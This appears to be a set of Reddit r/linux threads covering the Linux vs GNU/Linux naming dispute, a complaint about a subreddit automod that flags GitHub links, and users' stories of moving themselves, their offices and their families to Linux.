\> I still cannot get over the fact that win10 comes with mfking candy crush by default).

Wait till you find out that Ubuntu installs like gsudoku by default.
> *win10 comes with mfking candy crush by default*

Tried "candy crush" in the search box on two different Win10 installations; only web hits appear. Does the Win10 version have a different name? Or maybe it is in certain editions of Windows?

What's wrong with Candy Crush, anyway? (Other than that evil proprietary format of Candy Crush documents that everyone keeps sending, that ensnare everyone into the Candy Office ecosystem.)

In 1983, I was mildly addicted to Lode Runner (that sweet Apple II port of it). Played it 6 hours straight one day and got through all 150 levels. I made plenty of levels of my own with the editor. Damn that son of a bitch Doug Smith for making a great game; games should suck so nobody would be addicted to them.
It's like comparing a prostitute to a wife.

I always get some reason for preferring Windows/MacOs like: "it has more of X". Very strong argument for computer folks, but if there was a proper benchmark were you could compare on a chart the level of annoyances (EULAs, serials, preinstalled apps and even ads) and the hacking potential (usage, customization, debugging, up to development), you would see some shitty results in anything non Free Software.
No, Richard, it's 'Linux', not 'GNU/Linux'. The most important contributions that the FSF made to Linux were the creation of the GPL and the GCC compiler. Those are fine and inspired products. GCC is a monumental achievement and has earned you, RMS, and the Free Software Foundation countless kudos and much appreciation.

Following are some reasons for you to mull over, including some already answered in your FAQ.

One guy, Linus Torvalds, used GCC to make his operating system (yes, Linux is an OS -- more on this later). He named it 'Linux' with a little help from his friends. Why doesn't he call it GNU/Linux? Because he wrote it, with more help from his friends, not you. You named your stuff, I named my stuff -- including the software I wrote using GCC -- and Linus named his stuff. The proper name is Linux because Linus Torvalds says so. Linus has spoken. Accept his authority. To do otherwise is to become a nag. You don't want to be known as a nag, do you?

(An operating system) != (a distribution). Linux is an operating system. By my definition, an operating system is that software which provides and limits access to hardware resources on a computer. That definition applies whereever you see Linux in use. However, Linux is usually distributed with a collection of utilities and applications to make it easily configurable as a desktop system, a server, a development box, or a graphics workstation, or whatever the user needs. In such a configuration, we have a Linux (based) distribution. Therein lies your strongest argument for the unwieldy title 'GNU/Linux' (when said bundled software is largely from the FSF). Go bug the distribution makers on that one. Take your beef to Red Hat, Mandrake, and Slackware. At least there you have an argument. Linux alone is an operating system that can be used in various applications without any GNU software whatsoever. Embedded applications come to mind as an obvious example.

Next, even if we limit the GNU/Linux title to the GNU-based Linux distributions, we run into another obvious problem. XFree86 may well be more important to a particular Linux installation than the sum of all the GNU contributions. More properly, shouldn't the distribution be called XFree86/Linux? Or, at a minimum, XFree86/GNU/Linux? Of course, it would be rather arbitrary to draw the line there when many other fine contributions go unlisted. Yes, I know you've heard this one before. Get used to it. You'll keep hearing it until you can cleanly counter it.

Last, I'd like to point out that we Linux and GNU users shouldn't be fighting among ourselves over naming other people's software. But what the heck, I'm in a bad mood now. I think I'm feeling sufficiently obnoxious to make the point that GCC is so very famous and, yes, so very useful only because Linux was developed. In a show of proper respect and gratitude, shouldn't you and everyone refer to GCC as 'the Linux compiler'? Or at least, 'Linux GCC'? Seriously, where would your masterpiece be without Linux? Languishing with the HURD?

If there is a moral buried in this rant, maybe it is this:

Be grateful for your abilities and your incredible success and your considerable fame. Continue to use that success and fame for good, not evil. Also, be especially grateful for Linux' huge contribution to that success. You, RMS, the Free Software Foundation, and GNU software have reached their current high profiles largely on the back of Linux. You have changed the world. Now, go forth and don't be a nag.

Thanks for listening.
[deleted]
How long are we going to keep this thing around? Look at **any** thread in which the Automod posts about using GitHub, and it has at least 20 downvotes. The sub doesn't care. We \*know\* it's not FLOSS. It does not meaningfully enhance the discussion in any way to keep reiterating it every time someone links to a freaking GH repo. It would be about as effective as adding an RMS bot that does nothing but reply to messages that say "Linux" without saying "GNU/Linux".

  


How demonstrably unpopular does a thing need to be before the mods will get rid of it?

EDIT: I wasn't expecting this to blow up in the manner that it did. There seems to be alot of dog piling on the mods, and that's probably my fault for setting the initial tone of the conversation. So let's see if we can dial back the hostility a bit. Regrettably I can't edit the title, or I'd change it to "**Please** Remove the Proprietary Automod", but, oh well. I can at least try to set a less contentious tone moving forward.
Mod here. I'm a newer-ish mod to the team, and I didn't add the rule, but I have no objection to removing it either. I'll let the other mods discuss in case there's some history or context I'm missing.

I will add though that the mod who I believe is responsible for the rule works very hard at removing so much spam you wouldn't believe. So I don't think a polite tone in making this request is out of order here. I think they were trying to use automation to promote a public good, even if it might be annoying some folks.

**EDIT: I've been removed as a mod for the above comment :/**

**EDIT2: And a higher mod has now added me back. Updates to come.**
Reddit is a non-free service too. There are other open-source alternatives. Maybe the bot should drop a message every time someone posts. ^(/s)
Gotta love the fact that the newer mod, u/purpleidea was like, yeah, sure, I’ll think about it, then u/CAP_NAME_NOW_UPVOTE was immediately like *no*. That’s *amazing* moderating skills right there. Way to go u/purpleidea, boo u/CAP_NAME_NOW_UPVOTE
The hypocrisy: [https://github.com/CAPNAMENOWUPVOTE/LinuxSubredditRules](https://github.com/CAPNAMENOWUPVOTE/LinuxSubredditRules)
[deleted]
[deleted]
> RMS bot that does nothing but reply to messages that say "Linux" without saying "GNU/Linux".

That would be a hilarious April fools prank, just saying
It's a worthless message. The sooner it goes, the better.
My favorite part is the suggestion it makes to encourage them to move to another site entirely.

Hey, lets go ask the OBS developers to take their entire codebase, the issues, existing threads, and all their ongoing discussions in them, onto Gitlab! I'm sure they'll listen to a small subset of Reddit asking them to do it amidst all the other work they have actually maintaining the software.

Edit: It helps to actually research the joke you're planning before actually writing it.
I dunno, I like having it around, it wouldn't feel the same without being able to downvote the automod whenever someone posts.
Stupid to have automods automatically be the top comment. If I wanted to read that crap, I would. Forcing it is awful.
I can't agree more. It's just more spam; like if there wasn't already enough everywhere.
Honestly for me the issue is how forceful the message comes across.

Why not just "If you're the repository owner, have you considered using a free alternative such as <x>?"
The last time I saw someone try to discuss this with the mods, people were getting banned for saying that using Linux doesn't mean you have to be an ideological supporter of FSF, so good luck. No wonder the wider tech community sometimes doesn't take Linux seriously
Joyent used to have a bot that corrected you if said you Linux instead of GNU/Linux.
I’d have to ask the question, why hasn’t the sub got a Mastodon instance yet?
Oh my god I was JUST about to write this post myself!
[deleted]
So much happened from this one post.

Thank you OP :)
Now this I can wholeheartedly agree with.

We know GH is closed-source, we just don't care because avoiding software simply because it isn't open-source is a terrible philosophy.
This isnt surprising. One of the main mods here, /u/CAP_NAME_NOW_UPVOTE, is super annoying and suborn af. He's def one of those old school linux types who IRL is socially awkward and has no friends. 

He literally destroyed a firearm subreddit he was mod of because he didn't have time to properly mod it. When asked if he could turn it over to users in the firearms community, he dug further in and turned the r/Taurus sub into a sub about stars instead of firearms. 

Guy is a stupid dick and it looks like he was unmodded from here so yay at least there~!
Also since foss is open it theoretically shouldn’t matter where you host it. Microsoft will steal your code anyway
You're not gonna get FOSS zealots to budge on something like that.  Fringe groups will use whatever they have at their disposal to spread their gospel.
It was an annoying comment, and I'm glad it won't be coming back in the future. 

That being said, it did remind me to "get with it" and migrate my stuff to GitLab when I first saw it. Maybe a pinned thread with FOSS alternatives to proprietary services like GitHub would be a useful resource.
Please remove it! This does nothing to help the Linux community. This kind of ideology pushing in the Linux community has always made me cringe and I feel it actually pushes people away. There's tons of proprietary software that runs on Linux and if I want to use it I shouldn't be harassed because it's not 100% open and RMS approved.
@More_Coffee_Than_Man it's only dogpiling on the one mod who unmodded three other mods for daring to agree with you, and then banned a bunch of other users. Thankfully kruug came to the rescue.
Anyone who remembers what happened to Google Code knows that GitHub could just go away if it's no longer profitable.  Using it as critical infrastructure is stupid.
[deleted]
Aaand it's deleted. 

Another Mod power trip.
Don't waste your breath. I posted about this a couple months ago and the post ended up getting removed/deleted. https://www.reddit.com/r/linux/comments/rzkbbu/dont_have_automoderator_bot_post_about_nonfree
Hmm, an RMS bot that responds to comments containing the phrase "Linux" and replies with with a corrected version containing "GNU/Linux" you say?
[It is important for free software to use free software infrastructure](https://drewdevault.com/2022/03/29/free-software-free-infrastructure.html), by Drew DeVault (creator of SwayWM and Sourcehut)
No, keep it. Take Gitlab for example, it makes the job pretty well and is much more in line with what linux is about. At some point we have to defend out interests, we wouldn't have a solid desktop now if it wasn't for open source.
  
> it has at least 20 downvotes
  
The sub has 740k people subscribed. And it's not just about popularity anyway.
  
I really wish that the people who are so mad after open source kept their energy for something more meaningful than complaining against a bot reminding them that github fell into the Microsoft side of computing while we have very efficient alternatives.
Nah the comment is good. Death to GitHub.
have you considered simply dealing with it

if youre this bothered by an automated message with legitimate cause, go outside
Better tell Linus to stop using GitHub to develop Linux: https://github.com/torvalds/linux
Can we just ban github links so that automod won't be necessary ? ;)
[deleted]
Yes please and while you're at it mod some microsoft and nvidia employees. Those are two companies that certifiably love linux. Just take a look at /r/linux_gaming where they sing the praises of proprietary drivers daily. /r/linux needs to move in this direction.
If people are still posting github links, then clearly they aren’t getting the message. There is actually a way to disable the automod… by not posting github links anymore.
They can use this project https://github.com/gc-plp/reddit-moderator-bot
please don't.
Are people who like the automod going to upvote it as often as those who get pissy with it and downvote out of frustration? Probably not, 20 downvotes doesn't demonstrate what the majority believe about it.

Sounds like we need more automods to me, consider not using Github? ya dummies.
I don't see a good reason to remove the automod, it's a good reminder and if it even convinces one person to mail or message the repo owner explaining that moving to something like Gitlab would be better (regardless of results), it has succeeded in promoting open software. In the end the choice is of the developers, but sometimes the audience is too complacent and has to be reminded to complain.

Now, if we can supplement that bot with one to post about copying or moving threads to lemmy for every (non-announcement) thread that is posted here, even better.
Hi everyone! I want to say thanks to everyone developing this awesome operating system, it might be funny, but it changed my life.

Let me start by stating the truth: Linux is noob friendly. I am a lawyer, my mom is a writer, my brother has a shop, we all use Linux, and we all love it. We ditched windows without trouble and we never looked back.

It all started when a few years ago my ms office license expired, I was a windows user and I've never heard of "open source" and I think I had a very vague idea of something called "Linux" existed. Anyway, I refused to pay for a license of ms office, and I refused to install a pirate version of it.

"Why do I have to pay so much money for something that my dad had on a windows 3.1 machine 20 years ago? Is not like I need something special." I looked on internet and eventually found OpenOffice, it was terrible, it closed randomly and didn't work. (Why are they still hurting the users and not just redirecting to LibreOffice, right?) My friend, who is also a lawyer, told me that in her office in the government they used LibreOffice, I thought it was the same so I didn't care much.

But then the forced updates of windows make me hate it. Once my laptop upgraded in the night for 8 hours! I was completely mad. So I started looking for alternatives, and I found by luck the word that will change my life "Ubuntu". I was so excited!! I remember doing the usb in the middle of the night and booting into it. It was ubuntu 14.04 with Unity.

"This is the most advanced thing I've ever seen!", I was mesmerized, Unity looked so modern! (eventually I would discover Kde, i3, xfce, and even stumpwm)  I felt so much joy, it even had an office suite! The next morning I went to my office with the same Usb and installed Ubuntu on all the machines.

A few weeks later my mom was about to buy a new laptop because her notebook took as long as 20 minutes (I kid you not) to boot. I said leave it to me, and boom, her computer was super fast! She liked it so much she asked me to install it on her main laptop too. Then my brother asked the same.

In my office the 3 lawyers working for me didn't have much trouble learning it. I was pleasantly surprised when one called me asking me for help to install a .deb file for her printer, she was using the terminal! She almost did it all correctly, but had trouble with sudo.

This was about 3 years ago. Ever since I haven't had much trouble, and when I do I know I can fix it myself, it is awesome, now I am learning programming: bash, php, common lisp, scheme, python. I've even compiled LFS once! I've used Arch Linux (yeah I know I had to say it), Fedora, Ubuntu, Debian, Kali, Trisquel, Parabola, Guix. I've learned so much! I am an emacs user, but I also know vim.

I've learned so much, about freedom and free software, about programming, about how an operating system works, and even about penetration testing. 

I honestly never understand when new users come here trying to shame Linux saying it is not or that the workflow is so different. There are so many desktops and some distros are so easy to use that I really think they are just trolls.

My mom never had much trouble with LibreOffice and sharing her books with her publisher,  neither did I with my clients. People seems to forget that ms office has trouble across versions or that it takes hours to update windows or that it is so full of bloatware and it takes so long just to boot. They rather shame Linux for having a different button for saving than the one they used.

The GNU/Linux communities have helped me to have something to focus and learn, a life safer during all this years of depression, sometimes I've read that the communities can be hard and anti-noob, but I've never seen that.

I really want to say thanks to all of you making this possible by contributing to GNU/Linux and free software. You changed my life for good, I appreciate it so much, I wish I could pay you all.  
Has the move to Linux/Free Software caused you to change any workflows? Law is an interesting use case which is not commonly discussed here. 
Wow! Great, linux is a fantastic OS now I am using Fedora and looks great so far, linux give you the freedom to have the system you want.
I'm a teacher and I use GNU/Linux :)


Specifically Solus
[deleted]
[deleted]
I am an electrical engineer (the hardware kind, don't know much about programming) and I use Linux to design circuits and PCBs with KiCAD.
> Let me start by stating the truth: Linux is noob friendly.

Gosh this can't be over-stated or said enough.
Awesome.

I'm a video game developer and I've only recently started using Linux. I'm super happy about it.

Ubuntu Budgie was super easy to install. It looks amazing. It has everything I need in the Software Center. Whenever I encounter a problem, I love finding those infamous copy paste terminal commands to fix it. Some people find that off putting, but I like how in the Linux world, everything CAN be fixed.

It's not like how in Windows things just are the way they are until Microsoft changes it.

Now that I'm hearing about all these Microsoft EU Bribery cases, I'm really looking to steer clear of Microsoft.

I still have windows on my desktop for gaming, but I hope that Steam/Vulkan/WINE will be a feasible replacement.
You probably already are aware, but I use [gscan2pdf](http://gscan2pdf.sourceforge.net/) with my Fujitsu ScanSnap. It works with any ADF scanner to stitch whole documents together into PDF. It's in the Fedora repos. :) I mention this because my brother in law is a lawyer and he cannot live without his document scanner.
[deleted]
I am lawyer and use Ubuntu at work since 10.04

Now we are 3 lawyers in the firm working on Ubuntu 18.04 and the 3 others seriously consider to follow.

We also have debian headless running our files, database and email servers and another linux distro for the rooter things.

The Linux-desktop was not always an easy way -printer drivers and security cards mainly- but i will never go back. Ans it gave me the opportunity to give back community without being a programmer.

https://doc.ubuntu-fr.org/avocats_sur_ubuntu

Open-source is the most beautifull gift the dev community gave to noob-users like me !

(french speaking, sorry for spelling)
I chuckle when you mention pirating software, imagine how awkward it would be as a lawyer to pirate software.
You should talk to Bradley Kuhn and other free and opensource law firms.
[deleted]
Cool! I know a few well-known lawyers who use GNU/Linux as their daily driver. They also use git. They're more efficient because of it too!

What kind of lawyer are you?
Gosh dang this was heartwarming to read!
Fellow lawyer and Linux-lover here, though I use a Mac as my daily driver. I run a Docassemble Docker container on my home Linux server and use it every day in my practice. I highly recommend checking it out if you aren’t already familiar with it.
> I've used Arch Linux (yeah I know I had to say it)

ONE OF US, ONE OF US
Me too! And now I have the whole office using LibreOffice because only LibreOffice can do a good table of authorities.
> I wish I could pay you all.

Donate time and expertise to the EFF!
I am glad you switched, glad you're learning so many things. Your post made me smile
I am an open source contributor like million others driven by the urge to keep things free and open to all folks. I felt so happy to read your post and with the enthusiasm you shared your experience. Such posts motivate people like us. Thank You.

&#x200B;

\>  I wish I could pay you all.   
about this, you using the software is enough payment. you can go further by reporting bugs, providing suggestions on forums, answering other's questions on forums and off course if you do not get the time for all this, you can just find the donations pages for all the products you love and make monitory donations.  


Once again, thanks a lot.  

[deleted]
I'm a school teacher and I love GNU/Linux.
To me it's always really cool when someone who doesn't have Linux or computers as their profession learns Linux and scripting and programming and stuff, and really just makes it work for them. That's always really impressive to me.
Since you mentioned that you were a lawyer. What word processor do you use to make document to submit to courts?

My understanding is that only WordPerfect was good enough to create the documents correctly to submit to court. This is likely wrong/outdated knowledge though.
> linux is noob friendly

Says the man who's unofficial job title would be: RTFM, "read the fucking (legal) manual".

But that's jusk kidding. Cool that you've comfortable with Linux.

I'm a Lawyer too, thought in my country there's really no need to use Windows, you just need a word processor and a PDF reader, a Calculation Sheet if you do Taxes stuff. Fortunately (Though many people don't like to admit it), Google is really pushing the web-app ecosystem, so there are some apps like Office online that you don't even need to download anymore. I still dual boot though, some PC games are Windows exclusive and thought I could use a virtual machine, my current hardware has some trouble with virtualization. If it weren't for that, I (And surely more people) would be only GNU/Linux user.
I'm also a Linux Lawyer! I've been a fan of various forms of linux since the turn of the century. It took me a while to settle into a job that didn't force me to use Windows as a matter of company policy, but I'm thrilled now that I can use my favorite OS as my work OS.  

I couldn't agree more with your comments about the Linux community. Back when I was getting started, I had plenty of questions and found a lot of thoughtful, detailed answers when I started browsing forums. There are a LOT of people out there that want to help new people figure things out.

For me, it's all about the "different" Linux workflow! The Windows taskbar setup has never really appealed to me (ditto the Mac OS dock) and it always felt like there had to be a better way to get things done. I've gotten into i3 lately and love how easy it is to switch between many documents and programs at once. I'm sure that I'll be using something else in a few years but for now I feel like I'm just a step or two away from controlling everything directly with the power of my mind.

I've still got a Windows VM, but it's becoming a much smaller part of my daily grind. 
I'm a web developer and damn do I wish they migrate our work pcs to Linux at the office. Win 10 is just so meh and finicky at times.

I do however use elementaryOS on our old home laptop - don't judge, I just seriously like how it looks, though the software center can be better.
Yeah, Linux is great! I keep hoping it'll get at least as popular as OSX on the desktop. (Windows seems too far and widespread just yet).

Genuine questions: I've been an Archlinux user for long time and I love it! What made you switch away from it? I've been kind of peeking at Fedora lately but I'm not sure I wanna make the switch. Their way of organising packages seems too confusing to one like me who's used to "main repos" and AUR.
So glad you've found the love of open source!

What kind of law do you practice? Because as soon as I saw "I'm a lawyer and I live GNU/Linux" I was hoping you were applying your talents to the cause.
I am a machinist and I love Linux! I use Fedora gnome as my daily driver and my cnc uses, wait for it, LinuxCNC :) Debian based (i think) with xfce, on old 32bit hardware because parallel port to the controller. 
I'm still using windows but have been toying with the idea of switching to linux. which version would you recommend for a new user?
[deleted]
I installed it to every computer at my mom house and never had to format them again.
Lawyer using Kali? Lol. 
Jk, I tried to get my family to switch to linux only to answer their constant questions. 
"Where is google?"
"What is root?"

Thanks for the great post! My family is also slowly moving to Linux, and so far I haven't had to do much helping, so I definitely agree with you on it being noob friendly. Way better than when I started with Slackware some many years ago.
I am Linux user since 20 years or so, ever since I was 10 and had my first computer. I know next to nothing but I have to use Microsoft Office for work. LibreOffice or Crossover simply doesn't do. Track Changer and comments messes up, that's unacceptable. 

I still use Debian in all my machines, but I dual boot with the work one for the first time in my life. 

- A lawyer specialized in contracts. 
I'm an illustrator and graphic designer (turned interaction designer) who uses GNU/Linux for work, and have done so for about 6 years. I've done everything from AD/CD jobs all the way to print ready layout and illustration of projects on it.

(since I started using it I've learned how a computer and servers work, I can do the worlds ugliest tiny little python programs and bash scripting, and I've gotten friends across the planet due to it)
>"Why do I have to pay so much money for something that my dad had on a windows 3.1 machine 20 years ago? 

Because the software is maintained, rebuilt for each iteration of Windows and improved upon every time.

The problem is not the price. The problem is the closed-source proprietary nature of it, and the fact that their formats are not future-proof at all, on top of locking people in the authoring software. 
I think im going to have to move my grandmothers computer over to linux, that or image the drive over to an SSD. It really shouldnt be too hard. I think the ONLY thing left that she is using that cant be obtained free on linux is the windows OS its self. shes using libreOffice, firefox, and thunderbird as her main programs on windows so the transition shouldnt be that hard. she used a xfce fedora spin on her desktop for a while and got by well with that.     

&#x200B;

&#x200B;

she recently got a new laptop, solid specs. 16gb of ram, latest gen i5 at like 3.2ghz. only down side: it has windows 10 obviously and a standard spinning platter hard drive. windows 10 does not like standard hard drives. the last 2 computers I've used it on have ran like total dog shit. her new laptop was okay out of the box and was okay for a while after (like a week, thats it I shit you not) but now it just runs like total ass due to the CONSTANT 90%+ disk usage that its always running for search bullshit and updates. even on a standard hard drive her computer would be 1000% faster if I nuked the bitch and just installed like Elementary or MINT or something on it. Probably what I should have done from the start.
I agree with almost everything. 

But(t): Linux is noob friendly IF you have the right hardware. If you don't, then chances are that things will get very screwed up.
Congratulation for this amazing migration ! Thought I might suggest you go one step further and try to learn the LaTeX typesetting engine as well as git source code management, specifically suited for your line of work.

LaTeX can be a non-interactive word processor, meaning for templated documents, youd "git pull" a template, edit an include/source (text) file with the proper parameters (name, date, case reference, and the likes), build the template to a PDF with a single command, push the source file back in your repository, and voilà, you have an efficient formal document generation engine, with archiving, distributed backups and collaborative writing built-in !

There's even bibtex for bibliography management (to reference case files, external documents…), graphical editors, complex document management using multiple source files so several people can work on what will result in an homogeneous single document, and so on…

Plus, it's the best typesetting engine ever built, so your document will be beautiful and the easiest to read.

Welcome to /r/latex !
I’ve created LaTeX forms with an input file I edit as well as toggles for certain common form clauses. 
Thanks for sharing your story

&#x200B;

Maybe one way an lawyer can add back to the open source community is helping OSS projects when they need a lawyer ?
Ok. Make a selfie photo with you and your diploma in one hand and today's magazine in other hand. :P

Terminal needs to be opened in back of photo with smth like \`uname -a\`. And then I will believe you.
Thanks for sharing! What a great story you got there. GNU/Linux flavors are such great OS's which also comes with all the competence building you experienced, which also is a big plus in this story. I started with Linux in -95 (Slackware) , but also use other OS's but GNU/Linux is by far the OS which is fun using and it's just imagination and competence which hindering for doing what you want. I hope more ppl will discover also it's robustness and greatness of a desktop OS, like it has proven it's quality on the server side and mobile devices (Android). Again - thanks for sharing! And your mom is a hero ! Respect :)
[deleted]
Another lawyer here. I use LaTeX extensively in my estate-tax planning practice. It saves me at least 100 hours a year in doc prep for typical cases. 
Thanks for your story, really inspiring. 

Just want to drop the Software names kvm, qemu, virtmanager, vfio in connection with gpu-passtrough. 

With this software components you can boot a virtual machine - which gets access to your GPU and you can connect the paasthroughed gpu to your monitor on a different port. So switching between Linux and Windows is just a monitor input change. 
Waiting for the "lawyer became kernel dev" reddit post :)
> (Why are they still hurting the users and not just redirecting to LibreOffice, right?)

Because they're owned by Oracle, and [Oracle cares as much about hurting users as a lawnmower cares about hurting you](https://news.ycombinator.com/item?id=4261851).
Saul, is that you? 😅
How do you handle dictation? Thats my major hurdle for working.
Good lad/lass
I'm an airline captain & I use Linux full time, including work-related stuff. 

Question: after listing all of those distros you've tried, no Linux Mint? Have you at least tried the Cinnamon desktop environment?
Not a lawyer but I switched to Linux in my work environment mid 2017 and haven't looked back since.  It's a small adjustment if you're familiar with Windows or MacOS but nothing compares to the flexibility and responsiveness.  Currently repping the KDE Spin of Fedora.  
My wife is also a lawyer (sole practitioner) and has been running Linux for at least the past 6 years.  She spends all her time inside LibreOffice Writer, Firefox, and Thunderbird and it pretty much JustWorks(TM) for her.  For her it's the apps and the OS doesn't matter much.  We occasionally have to hunt around for the Linux version of some app she has to use but it's always worked out.

For her the big hang-up switching to LibreOffice Writer was the lack of screen-split.  This is a long-standing feature request that never gets implemented.  The workaround is to open the same document in another window which is clunky but works.

As a software dev and sysadmin, I love that I can use Ansible to update her laptop along with all our other Linux devices while she's using it.  I can't imagine doing that on Windows.
> Love Linux

good, good..

> emacs user

HEATHEN!!!

j/k though! I'm glad non tech people find it accessible. This is super heart-warming
I can't believe an entire lawyer's office switched to Linux with no issues  
what kind of alternate reality am I reading?  
  
I used to work at an MSP for 5 years so I'm a bit biased against typical lawyers :)  
  
that's truly awesome for you guys!
>!..!<

 >!. .....!<
your right. a lot of things in proprietary land are planned obsolescence. for example in windows these days the mail app is terrible for a pc, leading actual PC users to want to buy outlook 365, though you cant remove mail.

I want to let you in on a secret too -- there is a utility out there called Samurai password reset, and if you choose NOT to use a MS account, a lot of people can crack into your computer and remove the password.

MAC IS NO BETTER EITHER! you can change even the root password from BASH with only user credentials.

so you have your choice of giving MS your password, or having it be a free-for all. in this case, giving ms the pass is more secure than apple lol. im telling you, if you left me in your house 30 minutes alone i could get in.

a lot of applications are kind of cool at this point because even if its slow theres been ongoing support in linux. when a good project dies, it forks.

the only real hitch with open source right now is proprietary drivers if you use nvidia.

outside of that, linux is a wonderful experience and a far better OS.
Awesome
I love Linux and work with it everyday. Also love your enthusiasm. But I never had all of those issues with Windows since at least Windows 7.

It really feels like your story is a huge mass of anecdotal evidence.
too good to be true
Don’t respond, it’s a trick!
What ? 'stumpwm' 

I don't believe you are 100% lawyer :). Stumpwm users mostly lisp programmers and you are a lawyer :)

Btw, I am curious, what drag you to learn Common Lisp ?

*PS: I am a lisper wannabe*
I personally recommend Google Docs if somebody complains that LO isn't perfectly like Word, but I never recommend going back to Microsoft. It certainly helps that you can use the Docs app on a phone and print from the cloud. I bet you'd get a kick from OpenSuse just for geeky reasons because of its different feel and Mint for the noobs.

---

PSA: Be very wary of USB drives found in parking lots, sidewalks, etc.! If you open it up and it's full of [these things](https://h2smedia-xk8vitkyr7kd6h.netdna-ssl.com/wp-content/uploads/2018/03/USB-Killer-how-it-works.jpg), it's a device designed to [destroy USB ports or entire logic boards](https://en.wikipedia.org/wiki/USB_Killer).
At least windows doesn't tear or judder
So all my friends know I'm obssessed with linux and I occasionally give them computer related advise. I let him (/u/munchinbeavers) borrow a laptop with ubuntu mate on it and he loved it. Then about 6 months later i ended up installing a newer ubuntu on his main laptop. Flash forward to now and it just came up in convo that all of his machines run linux. He has never had to call me for OS related issues even once. It honestly made me forget he is a regular linux user. This speaks loudly to how far linux has come.

  EDIT: Absolutely overwhelmed by the amount of discussion happening. There is a lot intimidation in the linux community in regards to ones knowledge when it comes to linux. But I love when the community can come together by just talking about linux and our experiences with it. Such a wide range of users and use cases. 
[deleted]
[cough](https://xkcd.com/456/)
My utterly computer-illiterate mother also uses Linux exclusively on her laptop. She only uses Chrome and Solitaire, so it doesn’t matter.
Bought my friend a Raspberry PI for his 30th. Within a few weeks he's surpassed my abilities. He's never messed with computing outside of web surfing. Spreading the good word one Pi at a time.
[deleted]
[removed]
Late 2004 I move in with some guy renting out a room.

I dump-shit vent about fucking Windows to a friend. "Linux dude," he says, "try Ubuntu." I write that down. I go home and try Ubuntu. I tell the guy I'm subrenting from.

Today, all of my computers run on Linux... and this guy who I am still friends with is now so much more hardcore into Linux than I am I cannot even. Who's more fanatical, the fanatic or the fanatic the fanatic recruits? The recruit.
So in other words, you taught him how to google hs problems?
My 83 year old dad has been running Linux since Vista went end of life. He recently got a new laptop and insisted that Windows was removed and his Linux OS installed.
My mother used to call me every other week because of problems with her laptop running Windows. ~5 years ago I installed Ubuntu on her laptop, and now I only have to help her once a year or something. 
My dad went full Linux and has not realized it yet.

My dad would not let XP die. To him it was the best OS ever made no matter how many viruses he was getting.

One day he called me up to fix yet another problem he was having. SO i said fuck it and convinced him that Microsoft brought back XP but an updated 2017 edition.

I put together and old system i had that was 1000 times better then what he was running and with a bit of modification this is his [system](https://i.imgur.com/K9WAVp8.png).

He only uses his computer to go on the internet. never installs 3rd party software.

We are now past a year and my dad has not called me to fix anything.
My brother, who is 10 years younger than I am, was living with my parents. He was running XP on his machine. (This was back about 10 years ago.) He moves out and takes his computer with him, which meant that my folks didn't have a computer anymore.

They aren't very technically capable, but I found out that they were using the computer to surf the web with Firefox. So, I threw together a 1.4ghz Athlon with 1GB of RAM. I put Kubuntu on it because at the time, it looked pretty "Windowsy".

They loved it. They even thought that it was a "prettier Windows", which, at the time, I had to agree with. Plus with Firefox basically being the same between Windows and Linux, there was zero learning curve. 
I used to run a small computer repair shop and an old lady came in with a Vista laptop.  Her daughter gave it to her after upgrading, the old lady was 80ish and had never ever used a computer before.

At first I tried to fix her shit, which I did to the best of my ability.  It was still shit though, so eventually it dawned on me that she didn't have any built-in bias or habits based on previous computer experience.  I wiped the drive and I stalled Mint, showed her how to use it, and for months she called me and told me about how much she loved her laptop and appreciated me fixing it up to be easier to use.
I used to preach Linux to my literate friends.  Though they'd listen, though they'd gawk at my custom desktop, though they'd see me do things that they could only guess about, they didn't switch.

Then one day I was watching Wendell on the Level1Tech's Linux channel on youtube and saw the GPU passthrough videos.  I thought I'd mention it to one of my friends.  He decided he would look into it.  After about a week he started messaging me telling me he was going to give it a try and wanted advice.  I kept tabs on him during the next week.   He worked it out and finally told me he had it up and running.  He'd done many performance tests and found it nearly as good as full native gaming performance.

He set up his media center with Linux.  He set up a cluster to encode some of his media.  He's set up an email server and web server (yes, at his house) using Linux, nginx, postfix, etc, just as I had at my shop.

I'd say he's all in.  Mostly.
> This speaks loudly to how far linux has come 

I think it speaks more to how far he has come; linux has been ready and perfectly useable for many people since the days of mandrake and redhat 9 (early 2000's). Many will argue it was ready before that. Certainly by when the first versions of ubuntu arrived in 2004.


You just have to get over the fact that it is "different" than what you are used to. My parents first computer usage was 6 years ago; they only know linux (xfce) and are completely lost on windows 8/10. Win 7 is vaguely similar enough they can get by in a pinch.


That's for desktop users. If you are an admin, linux has been ready since mid to late 90's? Again, arguable; but the point is... you like what you're used to. Whatever you get used to first will be what you probably prefer to use if you are not techy and just want to get stuff done.
If I didnt hardcore game I'd be 100% linux ut I gotta keep that 1 windows pc around. I also have dual boot on my laptop because my wireless at work which is cert based doesnt work with mint 18.3, very annoying! 
Linux power management, gaming support, and recording software needs to be improved significantly before I could reasonably switch. Though it becomes more and more feasible every year.
After installing Linux I've decided never to recommend a Chromebook to anyone ever again. A lightweight Linux distro offers all the benefits and none of the bullshit. And Linux is free, dammit.
Mainstream Linux distributions have been easy to install for over 20 years. Pop in a bootable CD or DVD ROM and off you go.

In 1996, I popped Red Hat 2 onto a Sun Sparcstation 20. Even on that, not your popular Intel PC, it was just pop in the CD-ROM and go through friendly install.

I had GIMP running on that setup.

It’s true I’ve had no problems at all, he taught me well. 
I'm using Linux on desktop since 2008, or something about that. I love this system. I never had to search for software online. It's all in the repository. The online community provide better support for free than Microsoft for money. I write code, surf the web, sometimes play games and watch movies. It's faster and more reliable than any other OS I used. What's best, you can use it for years and it's not slowing down. I remember reinstalling windows XP multiple times. Guys, it was insane. After MS introduced Vista i got my free Ubuntu CDs via shipping and I never went back. Every time I boot my PC (not often, because the uptimes are quite long ;\-)) I thank Ubuntu for introducing me to Linux. Hail the developers!

[https://image.ibb.co/hrXked/20180614\_181912.jpg](https://image.ibb.co/hrXked/20180614_181912.jpg)
My parents were running Windows XP for a long time, and I had to reinstall every few months because they had major issues. I was able to convince them to use Linux, and I installed Ubuntu (with Gnome2) on their computer. They used that for about 5 years, until they bought an iMac. They did like Linux.
I would have used Linux earlier back in 2007 if the wireless network card was working. I could get the live CD working and would have installed it if I could actually connect to the wifi. Oh those were the times.
I just spent a day in the hospital and all their monitors periodically displayed "Windows 10 upgrade coming soon. "  I legit wanted to have words with their sysadmin. 
Now If only we could get games to be released in this OS so I can abandon Windows in my gaming rig....
Word!
Yes guy you’re a true hero. 
